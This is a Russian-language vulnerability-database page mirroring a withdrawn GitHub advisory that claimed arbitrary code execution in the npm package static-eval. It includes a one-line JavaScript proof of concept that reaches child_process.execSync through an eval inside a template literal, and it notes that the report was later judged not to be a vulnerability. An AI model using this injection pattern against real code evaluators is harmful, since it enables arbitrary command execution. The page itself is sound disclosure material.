Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-8v27-2fg9-7h62

Опубликовано: 06 мая 2021
Источник: github
Github: Прошло ревью
CVSS3: 9.8

Описание

Withdrawn: Arbitrary Code Execution in static-eval

All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")} })()" var ast = parse(src).body[0].expression; evaluate(ast)

WITHDRAWN

This was deemed not a vulnerability. See this issue for details.

Пакеты

Наименование

static-eval

npm
Затронутые версииВерсия исправления

<= 2.1.0

Отсутствует

9.8 Critical

CVSS3

Дефекты

CWE-94

Связанные уязвимости

ubuntu
почти 5 лет назад

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none

nvd
почти 5 лет назад

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none

CVSS3: 9.8
fstec
почти 5 лет назад

Уязвимость функций FunctionExpressions и TemplateLiterals пакета static-eval пакетного менеджера NPM, позволяющая нарушителю выполнить произвольный код

9.8 Critical

CVSS3

Дефекты

CWE-94